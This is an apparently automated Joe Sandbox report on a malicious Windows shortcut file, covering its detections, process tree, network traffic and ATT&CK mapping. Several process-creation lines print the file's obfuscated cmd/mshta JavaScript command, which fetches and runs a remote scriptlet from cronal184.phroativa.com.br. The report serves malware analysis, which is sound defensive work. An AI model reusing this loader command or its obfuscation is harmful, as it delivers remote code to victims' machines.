Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
V_273686.Lnk.lnk

Overview

General Information

Sample name:V_273686.Lnk.lnk
Analysis ID:1446726
MD5:1dca9e98e575af3b1e2b90e59d75dc43
SHA1:16cc510d884cae94137a9fbf90c4d2c0f0c5d2f1
SHA256:a89872c21ac68096a76a60e5a13c77ddf79252c3097aea42865879c5b6d452f3
Tags:lnk
Infos:

Detection

MalLnk
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected malicious lnk
Machine Learning detection for sample
Creates a process in suspended mode (likely to inject code)
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 1008 cmdline: "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 1088 cmdline: MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
V_273686.Lnk.lnkJoeSecurity_MalLnkYara detected malicious lnkJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: V_273686.Lnk.lnkReversingLabs: Detection: 15%
    Source: V_273686.Lnk.lnkJoe Sandbox ML: detected
    Source: unknownHTTPS traffic detected: 172.67.217.192:443 -> 192.168.2.7:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.15.59.224:443 -> 192.168.2.7:49701 version: TLS 1.2
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /?2/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cronal184.phroativa.com.brConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.wikipedia.org
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /?2/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cronal184.phroativa.com.brConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.wikipedia.org
    Source: global trafficDNS traffic detected: DNS query: cronal184.phroativa.com.br
    Source: global trafficDNS traffic detected: DNS query: www.wikipedia.org
    Source: mshta.exe, 00000003.00000003.1233596963.00000290661AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTtps://cronal184.phroativa.com.br/?2/
    Source: mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: HTtps://cronal184.phroativa.com.br/?2/(
    Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drString found in binary or memory: https://creativecommons.org/licenses/by-sa/4.0/
    Source: mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236239083.0000028863F8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronal184.phroativa.com.br/
    Source: mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1233829051.00000290661DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronal184.phroativa.com.br/?2/
    Source: mshta.exe, 00000003.00000002.1236630762.0000029066412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronal184.phroativa.com.br/?2/St
    Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronal184.phroativa.com.br/?2/U
    Source: mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronal184.phroativa.com.br/?2/l
    Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drString found in binary or memory: https://donate.wikimedia.org/?utm_medium=portal&utm_campaign=portalFooter&utm_source=portalFooter
    Source: mshta.exe, 00000003.00000002.1235891376.0000028863EE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c
    Source: mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intake-logging.wikimedia.org/v1/eventsx
    Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&c
    Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drString found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&ct=portal&mt=8
    Source: mshta.exe, 00000003.00000003.1232948851.0000028863F93000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236254485.0000028863F94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drString found in binary or memory: https://meta.wikimedia.org/wiki/Privacy_policy
    Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drString found in binary or memory: https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipedias
    Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drString found in binary or memory: https://meta.wikimedia.org/wiki/Terms_of_use
    Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.wikip
    Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drString found in binary or memory: https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediu
    Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/2244px-Wikipedia-logo-v2.
    Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drString found in binary or memory: https://wikis.world/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownHTTPS traffic detected: 172.67.217.192:443 -> 192.168.2.7:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.15.59.224:443 -> 192.168.2.7:49701 version: TLS 1.2

    System Summary

    barindex
    Source: Yara matchFile source: V_273686.Lnk.lnk, type: SAMPLE
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
    Source: classification engineClassification label: mal68.troj.winLNK@4/1@2/2
    Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EJF5C7CA.htmJump to behavior
    Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: V_273686.Lnk.lnkReversingLabs: Detection: 15%
    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"Jump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior

    Persistence and Installation Behavior

    barindex
    Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
    Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
    Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: mshta.exe, 00000003.00000003.1232948851.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236254485.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232880364.0000028863FAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWi>pG
    Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP}
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"Jump to behavior
    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()"Jump to behavior
    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Email Collection
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    11
    Process Injection
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable Media2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    DLL Side-Loading
    Security Account Manager1
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared Drive13
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS12
    System Information Discovery
    Distributed Component Object ModelInput Capture1
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    V_273686.Lnk.lnk16%ReversingLabsShortcut.Trojan.Nioc
    V_273686.Lnk.lnk100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediu0%Avira URL Cloudsafe
    https://intake-logging.wikimedia.org/v1/eventsx0%Avira URL Cloudsafe
    https://creativecommons.org/licenses/by-sa/4.0/0%Avira URL Cloudsafe
    https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c0%Avira URL Cloudsafe
    https://cronal184.phroativa.com.br/?2/l0%Avira URL Cloudsafe
    https://cronal184.phroativa.com.br/0%Avira URL Cloudsafe
    HTtps://cronal184.phroativa.com.br/?2/0%Avira URL Cloudsafe
    https://cronal184.phroativa.com.br/?2/U0%Avira URL Cloudsafe
    https://www.wikipedia.org/0%Avira URL Cloudsafe
    https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/2244px-Wikipedia-logo-v2.0%Avira URL Cloudsafe
    https://play.google.com/store/apps/details?id=org.wikip0%Avira URL Cloudsafe
    https://donate.wikimedia.org/?utm_medium=portal&utm_campaign=portalFooter&utm_source=portalFooter0%Avira URL Cloudsafe
    https://meta.wikimedia.org/wiki/Privacy_policy0%Avira URL Cloudsafe
    https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipedias0%Avira URL Cloudsafe
    https://meta.wikimedia.org/wiki/Terms_of_use0%Avira URL Cloudsafe
    HTtps://cronal184.phroativa.com.br/?2/(0%Avira URL Cloudsafe
    https://cronal184.phroativa.com.br/?2/St0%Avira URL Cloudsafe
    https://wikis.world/0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    dyna.wikimedia.org
    185.15.59.224
    truefalse
      unknown
      cronal184.phroativa.com.br
      172.67.217.192
      truefalse
        unknown
        www.wikipedia.org
        unknown
        unknownfalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://www.wikipedia.org/false
          • Avira URL Cloud: safe
          unknown
          https://cronal184.phroativa.com.br/?2/false
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediumshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drfalse
            • Avira URL Cloud: safe
            unknown
            https://creativecommons.org/licenses/by-sa/4.0/mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drfalse
            • Avira URL Cloud: safe
            unknown
            https://cronal184.phroativa.com.br/?2/lmshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            HTtps://cronal184.phroativa.com.br/?2/mshta.exe, 00000003.00000003.1233596963.00000290661AD000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3cmshta.exe, 00000003.00000002.1235891376.0000028863EE5000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
